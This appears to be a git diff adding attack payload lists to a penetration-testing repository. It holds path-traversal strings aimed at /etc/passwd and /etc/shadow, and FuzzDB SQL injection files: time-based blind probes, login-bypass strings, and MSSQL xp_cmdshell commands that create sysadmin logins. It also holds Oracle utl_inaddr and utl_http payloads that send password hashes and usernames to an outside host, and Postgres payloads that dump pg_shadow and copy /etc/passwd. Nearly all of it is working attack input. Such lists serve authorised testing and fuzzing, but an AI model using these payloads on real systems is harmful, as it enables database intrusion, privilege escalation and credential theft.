+..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log +..2fetc2fpasswd +..2fetc2fpasswd%00 +..2f..2fetc2fpasswd +..2f..2fetc2fpasswd%00 +..2f..2f..2fetc2fpasswd +..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 +L2V0Yy9tYXN0ZXIucGFzc3dk +L21hc3Rlci5wYXNzd2Q= +ZXRjL3Bhc3N3ZA== +ZXRjL3NoYWRvdyUwMA== +L2V0Yy9wYXNzd2Q= +L2V0Yy9wYXNzd2QlMDA= +Li4vZXRjL3Bhc3N3ZA== +Li4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== diff --git a/SQL injection/Payloads/FUZZDB_GenericBlind.txt b/SQL injection/Payloads/FUZZDB_GenericBlind.txt new file mode 100644 index 0000000..71d2174 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_GenericBlind.txt @@ -0,0 +1,42 @@ +# from wapiti +sleep(__TIME__)# +1 or sleep(__TIME__)# +" or sleep(__TIME__)# +' or sleep(__TIME__)# +" or sleep(__TIME__)=" +' or sleep(__TIME__)=' +1) or sleep(__TIME__)# +") or sleep(__TIME__)=" +') or sleep(__TIME__)=' +1)) or sleep(__TIME__)# +")) or sleep(__TIME__)=" +')) or sleep(__TIME__)=' +;waitfor delay '0:0:__TIME__'-- +);waitfor delay '0:0:__TIME__'-- +';waitfor delay '0:0:__TIME__'-- +";waitfor delay '0:0:__TIME__'-- +');waitfor delay '0:0:__TIME__'-- +");waitfor delay '0:0:__TIME__'-- +));waitfor delay '0:0:__TIME__'-- +'));waitfor delay '0:0:__TIME__'-- +"));waitfor delay '0:0:__TIME__'-- +benchmark(10000000,MD5(1))# +1 or benchmark(10000000,MD5(1))# +" or benchmark(10000000,MD5(1))# +' or benchmark(10000000,MD5(1))# +1) or benchmark(10000000,MD5(1))# +") or benchmark(10000000,MD5(1))# +') or benchmark(10000000,MD5(1))# +1)) or benchmark(10000000,MD5(1))# +")) or benchmark(10000000,MD5(1))# +')) or benchmark(10000000,MD5(1))# +pg_sleep(__TIME__)-- +1 or pg_sleep(__TIME__)-- +" or pg_sleep(__TIME__)-- +' or pg_sleep(__TIME__)-- +1) or pg_sleep(__TIME__)-- +") or pg_sleep(__TIME__)-- +') or pg_sleep(__TIME__)-- +1)) or pg_sleep(__TIME__)-- +")) or pg_sleep(__TIME__)-- +')) or pg_sleep(__TIME__)-- diff --git a/SQL injection/Payloads/FUZZDB_MSSQL.txt b/SQL injection/Payloads/FUZZDB_MSSQL.txt new file mode 100644 index 0000000..98bffba --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MSSQL.txt @@ -0,0 +1,17 @@ +# you will need to customize/modify some of the vaules in the queries for best effect +'; exec master..xp_cmdshell 'ping 10.10.1.2'-- +'create user name identified by 'pass123' -- +'create user name identified by pass123 temporary tablespace temp default tablespace users; +' ; drop table temp -- +'exec sp_addlogin 'name' , 'password' -- +' exec sp_addsrvrolemember 'name' , 'sysadmin' -- +' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- +' grant connect to name; grant resource to name; -- +' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) +' or 1=1 -- +' union (select @@version) -- +' union (select NULL, (select @@version)) -- +' union (select NULL, NULL, (select @@version)) -- +' union (select NULL, NULL, NULL, (select @@version)) -- +' union (select NULL, NULL, NULL, NULL, (select @@version)) -- +' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- diff --git a/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt b/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt new file mode 100644 index 0000000..f9b53cf --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt @@ -0,0 +1,15 @@ +# ms-sqli info disclosure payload fuzzfile +# replace regex with your fuzzer for best results +# run wireshark or tcpdump, look for incoming smb or icmp packets from victim +# might need to terminate payloads with ;-- +select @@version +select @@servernamee +select @@microsoftversione +select * from master..sysserverse +select * from sysusers +exec master..xp_cmdshell 'ipconfig+/all' +exec master..xp_cmdshell 'net+view' +exec master..xp_cmdshell 'net+users' +exec master..xp_cmdshell 'ping+' +BACKUP database master to disks='\\\\backupdb.dat' +create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"-- diff --git a/SQL injection/Payloads/FUZZDB_MYSQL.txt b/SQL injection/Payloads/FUZZDB_MYSQL.txt new file mode 100644 index 0000000..9ada7a3 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MYSQL.txt @@ -0,0 +1,6 @@ +1'1 +1 exec sp_ (or exec xp_) +1 and 1=1 +1' and 1=(select count(*) from tablenames); -- +1 or 1=1 +1' or '1'='1 diff --git a/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt new file mode 100644 index 0000000..aeb89ca --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt @@ -0,0 +1,3 @@ +# mysql local file disclosure through sqli +# fuzz interesting absolute filepath/filename into +create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; diff --git a/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt b/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt new file mode 100644 index 0000000..c4ba291 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt @@ -0,0 +1,8 @@ +# regex replace as many as you can with your fuzzer for best results: +# +# also try to brute force a list of possible usernames, including possile admin acct names +' OR 1=1-- +'OR '' = ' Allows authentication without a valid username. +'-- +' union select 1, '', '' 1-- +'OR 1=1-- diff --git a/SQL injection/Payloads/FUZZDB_Oracle.txt b/SQL injection/Payloads/FUZZDB_Oracle.txt new file mode 100644 index 0000000..2b1e6ee --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_Oracle.txt @@ -0,0 +1,56 @@ +# contains statements from jbrofuzz +’ or ‘1’=’1 +' or '1'='1 +'||utl_http.request('httP://192.168.1.1/')||' +' || myappadmin.adduser('admin', 'newpass') || ' +' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i + diff --git a/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt b/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt new file mode 100644 index 0000000..d963527 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt @@ -0,0 +1,20 @@ +# info disclosure payload fuzzfile for pgsql +select version(); +select current_database(); +select current_user; +select session_user; +select current_setting('log_connections'); +select current_setting('log_statement'); +select current_setting('port'); +select current_setting('password_encryption'); +select current_setting('krb_server_keyfile'); +select current_setting('virtual_host'); +select current_setting('port'); +select current_setting('config_file'); +select current_setting('hba_file'); +select current_setting('data_directory'); +select * from pg_shadow; +select * from pg_group; +create table myfile (input TEXT); +copy myfile from '/etc/passwd'; +select * from myfile;copy myfile to /tmp/test; diff --git a/SQL injection/Payloads/Generic_SQLi b/SQL injection/Payloads/Generic_SQLi new file mode 100644 index 0000000..4a30a2e --- /dev/null +++ b/SQL injection/Payloads/Generic_SQLi @@ -0,0 +1,267 @@ +)%20or%20('x'='x +%20or%201=1 +; execute immediate 'sel' || 'ect us' || 'er' +benchmark(10000000,MD5(1))# +update +";waitfor delay '0:0:__TIME__'-- +1) or pg_sleep(__TIME__)-- +||(elt(-3+5,bin(15),ord(10),hex(char(45)))) +"hi"") or (""a""=""a" +delete +like +" or sleep(__TIME__)# +pg_sleep(__TIME__)-- +*(|(objectclass=*)) +declare @q nvarchar (200) 0x730065006c00650063 ... + or 0=0 # +insert +1) or sleep(__TIME__)# +) or ('a'='a +; exec xp_regread +*| +@var select @var as var into temp end -- +1)) or benchmark(10000000,MD5(1))# +asc +(||6) +"a"" or 3=3--" +" or benchmark(10000000,MD5(1))# +# from wapiti + or 0=0 -- +1 waitfor delay '0:0:10'-- + or 'a'='a +hi or 1=1 --" +or a = a + UNION ALL SELECT +) or sleep(__TIME__)=' +)) or benchmark(10000000,MD5(1))# +hi' or 'a'='a +0 +21 % +limit + or 1=1 + or 2 > 1 +")) or benchmark(10000000,MD5(1))# +PRINT +hi') or ('a'='a + or 3=3 +));waitfor delay '0:0:__TIME__'-- +a' waitfor delay '0:0:10'-- +1;(load_file(char(47,101,116,99,47,112,97,115, ... +or%201=1 +1 or sleep(__TIME__)# +or 1=1 + and 1 in (select var from temp)-- + or '7659'='7659 + or 'text' = n'text' + -- + or 1=1 or ''=' +declare @s varchar (200) select @s = 0x73656c6 ... +exec xp +; exec master..xp_cmdshell 'ping 172.10.1.255'-- +3.10E+17 +" or pg_sleep(__TIME__)-- +x' AND email IS NULL; -- +& +admin' or ' + or 'unusual' = 'unusual' +// +truncate +1) or benchmark(10000000,MD5(1))# +\x27UNION SELECT +declare @s varchar(200) select @s = 0x77616974 ... +tz_offset +sqlvuln +"));waitfor delay '0:0:__TIME__'-- +||6 +or%201=1 -- +%2A%28%7C%28objectclass%3D%2A%29%29 +or a=a +) union select * from information_schema.tables; +PRINT @@variable +or isNULL(1/0) /* +26 % +" or "a"="a +(sqlvuln) +x' AND members.email IS NULL; -- + or 1=1-- + and 1=( if((load_file(char(110,46,101,120,11 ... +0x770061006900740066006F0072002000640065006C00 ... +%20'sleep%2050' +as +1)) or pg_sleep(__TIME__)-- +/**/or/**/1/**/=/**/1 + union all select @@version-- +,@variable +(sqlattempt2) + or (EXISTS) +t'exec master..xp_cmdshell 'nslookup www.googl ... +%20$(sleep%2050) +1 or benchmark(10000000,MD5(1))# +%20or%20''=' +||UTL_HTTP.REQUEST + or pg_sleep(__TIME__)-- +hi' or 'x'='x'; +") or sleep(__TIME__)=" + or 'whatever' in ('whatever') +; begin declare @var varchar(8000) set @var=' ... + union select 1,load_file('/etc/passwd'),1,1,1; +0x77616974666F722064656C61792027303A303A313027 ... +exec(@s) +) or pg_sleep(__TIME__)-- + union select + or sleep(__TIME__)# + select * from information_schema.tables-- +a' or 1=1-- +a' or 'a' = 'a +declare @s varchar(22) select @s = + or 2 between 1 and 3 + or a=a-- + or '1'='1 +| + or sleep(__TIME__)=' + or 1 --' +or 0=0 #" 